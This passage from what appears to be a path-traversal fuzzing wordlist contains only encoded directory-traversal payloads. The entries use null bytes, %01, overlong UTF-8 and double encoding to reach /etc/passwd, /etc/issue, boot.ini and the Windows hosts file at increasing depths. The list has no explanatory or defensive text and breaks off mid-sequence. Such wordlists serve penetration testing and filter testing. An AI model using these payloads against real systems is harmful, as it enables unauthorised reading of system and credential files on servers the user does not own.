-.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -.%00.%25c0%25afetc%25c0%25afpasswd -.%00.%25c0%25afetc%25c0%25afissue -.%00.%25c0%25afboot.ini -.%00.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -.%00.%25c0%25af.%00.%25c0%25afetc%25c0%25afpasswd -.%00.%25c0%25af.%00.%25c0%25afetc%25c0%25afissue -.%00.%25c0%25af.%00.%25c0%25afboot.ini -.%00.%25c0%25af.%00.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25afetc%25c0%25afpasswd -.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25afetc%25c0%25afissue -.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25afboot.ini -.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25afetc%25c0%25afpasswd -.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25afetc%25c0%25afissue -.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25afboot.ini -.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25afetc%25c0%25afpasswd -.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25afetc%25c0%25afissue -.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25afboot.ini -.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25afetc%25c0%25afpasswd -.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25afetc%25c0%25afissue -.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25afboot.ini -.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -.%00.%f0%80%80%afetc%f0%80%80%afpasswd -.%00.%f0%80%80%afetc%f0%80%80%afissue -.%00.%f0%80%80%afboot.ini -.%00.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -.%00.%f0%80%80%af.%00.%f0%80%80%afetc%f0%80%80%afpasswd -.%00.%f0%80%80%af.%00.%f0%80%80%afetc%f0%80%80%afissue -.%00.%f0%80%80%af.%00.%f0%80%80%afboot.ini -.%00.%f0%80%80%af.%00.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%afetc%f0%80%80%afpasswd -.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%afetc%f0%80%80%afissue -.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%afboot.ini -.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%afetc%f0%80%80%afpasswd -.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%afetc%f0%80%80%afissue -.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%afboot.ini -.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%afetc%f0%80%80%afpasswd -.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%afetc%f0%80%80%afissue -.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%afboot.ini -.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%afetc%f0%80%80%afpasswd -.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%afetc%f0%80%80%afissue -.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%afboot.ini -.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%af.%00.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -.%00.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -.%00.%f8%80%80%80%afetc%f8%80%80%80%afissue -.%00.%f8%80%80%80%afboot.ini -.%00.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -.%00.%f8%80%80%80%af.%00.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -.%00.%f8%80%80%80%af.%00.%f8%80%80%80%afetc%f8%80%80%80%afissue -.%00.%f8%80%80%80%af.%00.%f8%80%80%80%afboot.ini -.%00.%f8%80%80%80%af.%00.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%afetc%f8%80%80%80%afissue -.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%afboot.ini -.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%afetc%f8%80%80%80%afissue -.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%afboot.ini -.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%afetc%f8%80%80%80%afissue -.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%afboot.ini -.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%afetc%f8%80%80%80%afissue -.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%afboot.ini -.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%af.%00.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -..%01/etc/passwd -..%01/etc/issue -..%01/boot.ini -..%01/windows/system32/drivers/etc/hosts -..%01/..%01/etc/passwd -..%01/..%01/etc/issue -..%01/..%01/boot.ini -..%01/..%01/windows/system32/drivers/etc/hosts -..%01/..%01/..%01/etc/passwd -..%01/..%01/..%01/etc/issue -..%01/..%01/..%01/boot.ini -..%01/..%01/..%01/windows/system32/drivers/etc/hosts -..%01/..%01/..%01/..%01/etc/passwd -..%01/..%01/..%01/..%01/etc/issue -..%01/..%01/..%01/..%01/boot.ini -..%01/..%01/..%01/..%01/windows/system32/drivers/etc/hosts -..%01/..%01/..%01/..%01/..%01/etc/passwd -..%01/..%01/..%01/..%01/..%01/etc/issue -..%01/..%01/..%01/..%01/..%01/boot.ini -..%01/..%01/..%01/..%01/..%01/windows/system32/drivers/etc/hosts -..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd -..%01/..%01/..%01/..%01/..%01/..%01/etc/issue -..%01/..%01/..%01/..%01/..%01/..%01/boot.ini -..%01/..%01/..%01/..%01/..%01/..%01/windows/system32/drivers/etc/hosts -..%01\etc\passwd -..%01\etc\issue -..%01\boot.ini -..%01\windows\system32\drivers\etc\hosts -..%01\..%01\etc\passwd -..%01\..%01\etc\issue -..%01\..%01\boot.ini -..%01\..%01\windows\system32\drivers\etc\hosts -..%01\..%01\..%01\etc\passwd -..%01\..%01\..%01\etc\issue -..%01\..%01\..%01\boot.ini -..%01\..%01\..%01\windows\system32\drivers\etc\hosts -..%01\..%01\..%01\..%01\etc\passwd -..%01\..%01\..%01\..%01\etc\issue -..%01\..%01\..%01\..%01\boot.ini -..%01\..%01\..%01\..%01\windows\system32\drivers\etc\hosts -..%01\..%01\..%01\..%01\..%01\etc\passwd -..%01\..%01\..%01\..%01\..%01\etc\issue -..%01\..%01\..%01\..%01\..%01\boot.ini -..%01\..%01\..%01\..%01\..%01\windows\system32\drivers\etc\hosts -..%01\..%01\..%01\..%01\..%01\..%01\etc\passwd -..%01\..%01\..%01\..%01\..%01\..%01\etc\issue -..%01\..%01\..%01\..%01\..%01\..%01\boot.ini -..%01\..%01\..%01\..%01\..%01\..%01\windows\system32\drivers\etc\hosts -..%01%2fetc%2fpasswd -..%01%2fetc%2fissue -..%01%2fboot.ini -..%01%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -..%01%2f..%01%2fetc%2fpasswd -..%01%2f..%01%2fetc%2fissue -..%01%2f..%01%2fboot.ini -..%01%2f..%01%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -..%01%2f..%01%2f..%01%2fetc%2fpasswd -..%01%2f..%01%2f..%01%2fetc%2fissue -..%01%2f..%01%2f..%01%2fboot.ini -..%01%2f..%01%2f..%01%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -..%01%2f..%01%2f..%01%2f..%01%2fetc%2fpasswd -..%01%2f..%01%2f..%01%2f..%01%2fetc%2fissue -..%01%2f..%01%2f..%01%2f..%01%2fboot.ini -..%01%2f..%01%2f..%01%2f..%01%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -..%01%2f..%01%2f..%01%2f..%01%2f..%01%2fetc%2fpasswd -..%01%2f..%01%2f..%01%2f..%01%2f..%01%2fetc%2fissue -..%01%2f..%01%2f..%01%2f..%01%2f..%01%2fboot.ini -..%01%2f..%01%2f..%01%2f..%01%2f..%01%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -..%01%2f..%01%2f..%01%2f..%01%2f..%01%2f..%01%2fetc%2fpasswd -..%01%2f..%01%2f..%01%2f..%01%2f..%01%2f..%01%2fetc%2fissue -..%01%2f..%01%2f..%01%2f..%01%2f..%01%2f..%01%2fboot.ini -..%01%2f..%01%2f..%01%2f..%01%2f..%01%2f..%01%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -..%01%5cetc%5cpasswd -..%01%5cetc%5cissue -..%01%5cboot.ini -..%01%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -..%01%5c..%01%5cetc%5cpasswd -..%01%5c..%01%5cetc%5cissue -..%01%5c..%01%5cboot.ini -..%01%5c..%01%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -..%01%5c..%01%5c..%01%5cetc%5cpasswd -..%01%5c..%01%5c..%01%5cetc%5cissue -..%01%5c..%01%5c..%01%5cboot.ini -..%01%5c..%01%5c..%01%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -..%01%5c..%01%5c..%01%5c..%01%5cetc%5cpasswd -..%01%5c..%01%5c..%01%5c..%01%5cetc%5cissue -..%01%5c..%01%5c..%01%5c..%01%5cboot.ini -..%01%5c..%01%5c..%01%5c..%01%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -..%01%5c..%01%5c..%01%5c..%01%5c..%01%5cetc%5cpasswd -..%01%5c..%01%5c..%01%5c..%01%5c..%01%5cetc%5cissue -..%01%5c..%01%5c..%01%5c..%01%5c..%01%5cboot.ini -..%01%5c..%01%5c..%01%5c..%01%5c..%01%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -..%01%5c..%01%5c..%01%5c..%01%5c..%01%5c..%01%5cetc%5cpasswd -..%01%5c..%01%5c..%01%5c..%01%5c..%01%5c..%01%5cetc%5cissue -..%01%5c..%01%5c..%01%5c..%01%5c..%01%5c..%01%5cboot.ini -..%01%5c..%01%5c..%01%5c..%01%5c..%01%5c..%01%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -..%010x2fetc0x2fpasswd -..%010x2fetc0x2fissue -..%010x2fboot.ini -..%010x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -..%010x2f..%010x2fetc0x2fpasswd -..%010x2f..%010x2fetc0x2fissue -..%010x2f..%010x2fboot.ini -..%010x2f..%010x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -..%010x2f..%010x2f..%010x2fetc0x2fpasswd -..%010x2f..%010x2f..%010x2fetc0x2fissue -..%010x2f..%010x2f..%010x2fboot.ini -..%010x2f..%010x2f..%010x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -..%010x2f..%010x2f..%010x2f..%010x2fetc0x2fpasswd -..%010x2f..%010x2f..%010x2f..%010x2fetc0x2fissue -..%010x2f..%010x2f..%010x2f..%010x2fboot.ini -..%010x2f..%010x2f..%010x2f..%010x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -..%010x2f..%010x2f..%010x2f..%010x2f..%010x2fetc0x2fpasswd -..%010x2f..%010x2f..%010x2f..%010x2f..%010x2fetc0x2fissue -..%010x2f..%010x2f..%010x2f..%010x2f..%010x2fboot.ini -..%010x2f..%010x2f..%010x2f..%010x2f..%010x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -..%010x2f..%010x2f..%010x2f..%010x2f..%010x2f..%010x2fetc0x2fpasswd -..%010x2f..%010x2f..%010x2f..%010x2f..%010x2f..%010x2fetc0x2fissue -..%010x2f..%010x2f..%010x2f..%010x2f..%010x2f..%010x2fboot.ini -..%010x2f..%010x2f..%010x2f..%010x2f..%010x2f..%010x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -..%010x5cetc0x5cpasswd -..%010x5cetc0x5cissue -..%010x5cboot.ini -..%010x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -..%010x5c..%010x5cetc0x5cpasswd -..%010x5c..%010x5cetc0x5cissue -..%010x5c..%010x5cboot.ini -..%010x5c..%010x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -..%010x5c..%010x5c..%010x5cetc0x5cpasswd -..%010x5c..%010x5c..%010x5cetc0x5cissue -..%010x5c..%010x5c..%010x5cboot.ini -..%010x5c..%010x5c..%010x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -..%010x5c..%010x5c..%010x5c..%010x5cetc0x5cpasswd -..%010x5c..%010x5c..%010x5c..%010x5cetc0x5cissue -..%010x5c..%010x5c..%010x5c..%010x5cboot.ini -..%010x5c..%010x5c..%010x5c..%010x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -..%010x5c..%010x5c..%010x5c..%010x5c..%010x5cetc0x5cpasswd -..%010x5c..%010x5c..%010x5c..%010x5c..%010x5cetc0x5cissue -..%010x5c..%010x5c..%010x5c..%010x5c..%010x5cboot.ini -..%010x5c..%010x5c..%010x5c..%010x5c..%010x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -..%010x5c..%010x5c..%010x5c..%010x5c..%010x5c..%010x5cetc0x5cpasswd -..%010x5c..%010x5c..%010x5c..%010x5c..%010x5c..%010x5cetc0x5cissue -..%010x5c..%010x5c..%010x5c..%010x5c..%010x5c..%010x5cboot.ini -..%010x5c..%010x5c..%010x5c..%010x5c..%010x5c..%010x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -..%01%252fetc%252fpasswd -..%01%252fetc%252fissue -..%01%252fboot.ini -..%01%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -..%01%252f..%01%252fetc%252fpasswd -..%01%252f..%01%252fetc%252fissue -..%01%252f..%01%252fboot.ini -..%01%252f..%01%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -..%01%252f..%01%252f..%01%252fetc%252fpasswd -..%01%252f..%01%252f..%01%252fetc%252fissue -..%01%252f..%01%252f..%01%252fboot.ini -..%01%252f..%01%252f..%01%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -..%01%252f..%01%252f..%01%252f..%01%252fetc%252fpasswd -..%01%252f..%01%252f..%01%252f..%01%252fetc%252fissue -..%01%252f..%01%252f..%01%252f..%01%252fboot.ini -..%01%252f..%01%252f..%01%252f..%01%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -..%01%252f..%01%252f..%01%252f..%01%252f..%01%252fetc%252fpasswd -..%01%252f..%01%252f..%01%252f..%01%252f..%01%252fetc%252fissue -..%01%252f..%01%252f..%01%252f..%01%252f..%01%252fboot.ini -..%01%252f..%01%252f..%01%252f..%01%252f..%01%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -..%01%252f..%01%252f..%01%252f..%01%252f..%01%252f..%01%252fetc%252fpasswd -..%01%252f..%01%252f..%01%252f..%01%252f..%01%252f..%01%252fetc%252fissue -..%01%252f..%01%252f..%01%252f..%01%252f..%01%252f..%01%252fboot.ini -..%01%252f..%01%252f..%01%252f..%01%252f..%01%252f..%01%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -..%01%255cetc%255cpasswd -..%01%255cetc%255cissue -..%01%255cboot.ini -..%01%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -..%01%255c..%01%255cetc%255cpasswd -..%01%255c..%01%255cetc%255cissue -..%01%255c..%01%255cboot.ini -..%01%255c..%01%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -..%01%255c..%01%255c..%01%255cetc%255cpasswd -..%01%255c..%01%255c..%01%255cetc%255cissue -..%01%255c..%01%255c..%01%255cboot.ini -..%01%255c..%01%255c..%01%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -..%01%255c..%01%255c..%01%255c..%01%255cetc%255cpasswd -..%01%255c..%01%255c..%01%255c..%01%255cetc%255cissue -..%01%255c..%01%255c..%01%255c..%01%255cboot.ini -..%01%255c..%01%255c..%01%255c..%01%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -..%01%255c..%01%255c..%01%255c..%01%255c..%01%255cetc%255cpasswd -..%01%255c..%01%255c..%01%255c..%01%255c..%01%255cetc%255cissue -..%01%255c..%01%255c..%01%255c..%01%255c..%01%255cboot.ini -..%01%255c..%01%255c..%01%255c..%01%255c..%01%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -..%01%255c..%01%255c..%01%255c..%01%255c..%01%255c..%01%255cetc%255cpasswd -..%01%255c..%01%255c..%01%255c..%01%255c..%01%255c..%01%255cetc%255cissue -..%01%255c..%01%255c..%01%255c..%01%255c..%01%255c..%01%255cboot.ini -..%01%255c..%01%255c..%01%255c..%01%255c..%01%255c..%01%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -..%01%c0%2fetc%c0%2fpasswd -..%01%c0%2fetc%c0%2fissue -..%01%c0%2fboot.ini -..%01%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -..%01%c0%2f..%01%c0%2fetc%c0%2fpasswd -..%01%c0%2f..%01%c0%2fetc%c0%2fissue -..%01%c0%2f..%01%c0%2fboot.ini -..%01%c0%2f..%01%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -..%01%c0%2f..%01%c0%2f..%01%c0%2fetc%c0%2fpasswd -..%01%c0%2f..%01%c0%2f..%01%c0%2fetc%c0%2fissue -..%01%c0%2f..%01%c0%2f..%01%c0%2fboot.ini -..%01%c0%2f..%01%c0%2f..%01%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -..%01%c0%2f..%01%c0%2f..%01%c0%2f..%01%c0%2fetc%c0%2fpasswd -..%01%c0%2f..%01%c0%2f..%01%c0%2f..%01%c0%2fetc%c0%2fissue -..%01%c0%2f..%01%c0%2f..%01%c0%2f..%01%c0%2fboot.ini -..%01%c0%2f..%01%c0%2f..%01%c0%2f..%01%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -..%01%c0%2f..%01%c0%2f..%01%c0%2f..%01%c0%2f..%01%c0%2fetc%c0%2fpasswd -..%01%c0%2f..%01%c0%2f..%01%c0%2f..%01%c0%2f..%01%c0%2fetc%c0%2fissue -..%01%c0%2f..%01%c0%2f..%01%c0%2f..%01%c0%2f..%01%c0%2fboot.ini -..%01%c0%2f..%01%c0%2f..%01%c0%2f..%01%c0%2f..%01%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -..%01%c0%2f..%01%c0%2f..%01%c0%2f..%01%c0%2f..%01%c0%2f..%01%c0%2fetc%c0%2fpasswd -..%01%c0%2f..%01%c0%2f..%01%c0%2f..%01%c0%2f..%01%c0%2f..%01%c0%2fetc%c0%2fissue -..%01%c0%2f..%01%c0%2f..%01%c0%2f..%01%c0%2f..%01%c0%2f..%01%c0%2fboot.ini -..%01%c0%2f..%01%c0%2f..%01%c0%2f..%01%c0%2f..%01%c0%2f..%01%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -..%01%c0%afetc%c0%afpasswd -..%01%c0%afetc%c0%afissue -..%01%c0%afboot.ini -..%01%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -..%01%c0%af..%01%c0%afetc%c0%afpasswd -..%01%c0%af..%01%c0%afetc%c0%afissue -..%01%c0%af..%01%c0%afboot.ini -..%01%c0%af..%01%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -..%01%c0%af..%01%c0%af..%01%c0%afetc%c0%afpasswd -..%01%c0%af..%01%c0%af..%01%c0%afetc%c0%afissue -..%01%c0%af..%01%c0%af..%01%c0%afboot.ini -..%01%c0%af..%01%c0%af..%01%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -..%01%c0%af..%01%c0%af..%01%c0%af..%01%c0%afetc%c0%afpasswd -..%01%c0%af..%01%c0%af..%01%c0%af..%01%c0%afetc%c0%afissue -..%01%c0%af..%01%c0%af..%01%c0%af..%01%c0%afboot.ini -..%01%c0%af..%01%c0%af..%01%c0%af..%01%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -..%01%c0%af..%01%c0%af..%01%c0%af..%01%c0%af..%01%c0%afetc%c0%afpasswd -..%01%c0%af..%01%c0%af..%01%c0%af..%01%c0%af..%01%c0%afetc%c0%afissue -..%01%c0%af..%01%c0%af..%01%c0%af..%01%c0%af..%01%c0%afboot.ini -..%01%c0%af..%01%c0%af..%01%c0%af..%01%c0%af..%01%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -..%01%c0%af..%01%c0%af..%01%c0%af..%01%c0%af..%01%c0%af..%01%c0%afetc%c0%afpasswd -..%01%c0%af..%01%c0%af..%01%c0%af..%01%c0%af..%01%c0%af..%01%c0%afetc%c0%afissue -..%01%c0%af..%01%c0%af..%01%c0%af..%01%c0%af..%01%c0%af..%01%c0%afboot.ini -..%01%c0%af..%01%c0%af..%01%c0%af..%01%c0%af..%01%c0%af..%01%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -..%01%c0%5cetc%c0%5cpasswd -..%01%c0%5cetc%c0%5cissue -..%01%c0%5cboot.ini -..%01%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -..%01%c0%5c..%01%c0%5cetc%c0%5cpasswd -..%01%c0%5c..%01%c0%5cetc%c0%5cissue -..%01%c0%5c..%01%c0%5cboot.ini -..%01%c0%5c..%01%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -..%01%c0%5c..%01%c0%5c..%01%c0%5cetc%c0%5cpasswd -..%01%c0%5c..%01%c0%5c..%01%c0%5cetc%c0%5cissue -..%01%c0%5c..%01%c0%5c..%01%c0%5cboot.ini -..%01%c0%5c..%01%c0%5c..%01%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -..%01%c0%5c..%01%c0%5c..%01%c0%5c..%01%c0%5cetc%c0%5cpasswd -..%01%c0%5c..%01%c0%5c..%01%c0%5c..%01%c0%5cetc%c0%5cissue -..%01%c0%5c..%01%c0%5c..%01%c0%5c..%01%c0%5cboot.ini -..%01%c0%5c..%01%c0%5c..%01%c0%5c..%01%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -..%01%c0%5c..%01%c0%5c..%01%c0%5c..%01%c0%5c..%01%c0%5cetc%c0%5cpasswd -..%01%c0%5c..%01%c0%5c..%01%c0%5c..%01%c0%5c..%01%c0%5cetc%c0%5cissue -..%01%c0%5c..%01%c0%5c..%01%c0%5c..%01%c0%5c..%01%c0%5cboot.ini -..%01%c0%5c..%01%c0%5c..%01%c0%5c..%01%c0%5c..%01%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -..%01%c0%5c..%01%c0%5c..%01%c0%5c..%01%c0%5c..%01%c0%5c..%01%c0%5cetc%c0%5cpasswd -..%01%c0%5c..%01%c0%5c..%01%c0%5c..%01%c0%5c..%01%c0%5c..%01%c0%5cetc%c0%5cissue -..%01%c0%5c..%01%c0%5c..%01%c0%5c..%01%c0%5c..%01%c0%5c..%01%c0%5cboot.ini -..%01%c0%5c..%01%c0%5c..%01%c0%5c..%01%c0%5c..%01%c0%5c..%01%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -..%01%c1%9cetc%c1%9cpasswd -..%01%c1%9cetc%c1%9cissue -..%01%c1%9cboot.ini -..%01%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -..%01%c1%9c..%01%c1%9cetc%c1%9cpasswd -..%01%c1%9c..%01%c1%9cetc%c1%9cissue -..%01%c1%9c..%01%c1%9cboot.ini -..%01%c1%9c..%01%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -..%01%c1%9c..%01%c1%9c..%01%c1%9cetc%c1%9cpasswd -..%01%c1%9c..%01%c1%9c..%01%c1%9cetc%c1%9cissue -..%01%c1%9c..%01%c1%9c..%01%c1%9cboot.ini -..%01%c1%9c..%01%c1%9c..%01%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -..%01%c1%9c..%01%c1%9c..%01%c1%9c..%01%c1%9cetc%c1%9cpasswd -..%01%c1%9c..%01%c1%9c..%01%c1%9c..%01%c1%9cetc%c1%9cissue 